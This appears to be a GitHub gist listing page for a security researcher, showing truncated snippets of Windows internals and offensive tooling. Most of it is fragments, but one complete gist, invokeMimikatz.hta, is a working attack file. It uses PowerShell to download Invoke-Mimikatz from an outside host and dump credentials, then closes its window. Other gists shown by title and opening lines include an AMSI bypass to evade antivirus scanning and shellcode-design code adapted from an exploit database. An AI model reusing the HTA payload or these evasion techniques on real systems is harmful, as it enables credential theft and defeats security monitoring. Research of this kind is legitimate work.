Skip to content

Instantly share code, notes, and snippets.

Avatar
🤗
buy me a beer plz 🍺

Sheng-Hao Ma aaaddress1

🤗
buy me a beer plz 🍺
View GitHub Profile
View gist:b19b5b0bfc5235d8d9499eef79dd7b84
__int64 __fastcall LdrpInitialize(PCONTEXT threadCtx, IMAGE_DOS_HEADER *peImgToFix)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
currTeb = NtCurrentTeb();
while ( 1 )
{
loadStep = (unsigned int)_InterlockedCompareExchange(&LdrpProcessInitialized, 1, 0);
if ( (_DWORD)loadStep == 1 && (currTeb->SameTebFlags & 0x2000) == 0 )
goto done;
View invokeMimikatz.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
View peParser.cpp
#include <windows.h>
#include <iostream>
bool readBinFile(const char fileName[], char*& bufPtr, DWORD& length) {
if (FILE* fp = fopen(fileName, "rb")) {
fseek(fp, 0, SEEK_END);
length = ftell(fp);
bufPtr = new char[length + 1];
fseek(fp, 0, SEEK_SET);
fread(bufPtr, sizeof(char), length, fp);
@aaaddress1
aaaddress1 / How to use a function pointer in VBA.md
Created Nov 18, 2021 — forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro
View How to use a function pointer in VBA.md

VB6 and VBA come with no support for function pointers.

Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.

These constraints can be avoided by using the DispCallFunc API. The DispCallFunc is widely used in VB6 when erasing the history of IE. Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.

As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.

View x64FunctionPointer.vba
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Const CC_STDCALL = 4
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr
Sub SayHello()
View x64FunctionPointer1.vba
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Const CC_STDCALL = 4
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr
Sub SayHello()
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active Mar 15, 2022
Windows 32-bit Shellcode Design without TEB & fs:30h
View memBruteforce.cpp
// memBruteforce.cpp by aaaddress1@chroot.org
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@aaaddress1
aaaddress1 / veh_AmsiBypass.cpp
Created Jul 20, 2021
(VEH) AMSI Bypass without Memory Patch
View veh_AmsiBypass.cpp
// Exception-Based AMSI Bypass
// by aaaddress1@chroot.org
#include <amsi.h>
#include <iostream>
#include <Windows.h>
#pragma comment(lib, "amsi.lib")
#pragma comment(lib, "ole32.lib")
#pragma warning( disable : 4996 )
#define AMSIPROJECTNAME L"scanner"
@aaaddress1
aaaddress1 / clrHosting_v4.0.cpp
Last active Jun 28, 2022
CLR Hosting: running dotNet binary in C/C++ & rewrite from .NET(4+) COM interface
View clrHosting_v4.0.cpp
// CLR Hosting, by aaaddress1@chroot.org
//
// it's a new edition rewrite for .NET(4+) COM interface
// original from github.com/etormadiv/HostingCLR
// & blog.xpnsec.com/hiding-your-dotnet-etw
//
// this PoC supports the following .NET entry:
// >>>> static void Main(string[] args);
//
#include <stdio.h>
@aaaddress1
aaaddress1 / win_iPython_ps1.md
Last active Jun 23, 2021
Guide: Install iPython on Windows 10 via PowerShell
View win_iPython_ps1.md

Install iPython on Windows 10 (PowerShell Script)

Install Python 3.7

mkdir C:/temp/ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.7.0/python-3.7.0.exe" -OutFile "c:/temp/python-3.7.0.exe" c:/temp/python-3.7.0.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0

Install iPyhton